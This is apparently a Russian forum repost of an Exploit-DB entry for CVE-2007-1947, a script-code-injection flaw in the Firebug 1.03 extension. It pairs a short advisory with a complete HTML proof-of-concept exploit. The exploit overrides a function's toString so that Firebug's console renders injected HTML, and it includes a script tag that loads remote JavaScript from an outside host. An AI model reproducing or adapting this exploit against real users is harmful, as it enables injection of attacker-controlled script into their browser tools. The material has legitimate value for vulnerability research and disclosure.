Exploit Firebug 1.03 - Rep.JS Script Code Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29820
Проверка EDB
  1. Пройдено
Автор
THOR LARHOLM
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2007-1947
Дата публикации
2007-03-06
Firebug 1.03 - Rep.JS Script Code Injection
HTML:
source: https://www.securityfocus.com/bid/23349/info

Firebug is prone to a script-code-injection vulnerability because it fails to adequately escape user-supplied data.

An attacker can exploit this issue to execute arbitrary script code in the context of the application.

Versions prior to 1.04 are vulnerable. 

<html> <head> <title>Firebug console HTML injection</title> <style> noscript, .nofirebug{ color: red } </style> </head> <body> <h1>Firebug console HTML injection</h1> <script type="text/javascript"> // A function that returns a specially formatted string function vulnstring(){ return 'function <b style="font-size:80px">foo(<script src="http://larholm.com/vuln/firebuginclude.js"></'+'script>) { }'; } // The function object to log with Firebug var a = function(){}; // Overwrite the default toString method a.toString = vulnstring; // Attempt to trigger the vulnerability if Firebug is installed and has console logging enabled if(typeof console!="undefined" && typeof console.log=="function"){ console.log(a); document.write('<p>Check your Firebug console output. If it says Foo() in very large letters and you get an alert then you are vulnerable and should upgrade to Firebug v1.0.4 or greater.</p>'); } else { // Show error document.write('<p class="nofirebug">This proof of concept exploit requires Firebug to work</p>'); } </script> <noscript><p>This proof of concept exploit requires that Javascript is enabled.</p></noscript> <h3>Cheers, <a href="http://larholm.com/">Thor Larholm</a></h3> </body></html>
 
Источник
www.exploit-db.com

Похожие темы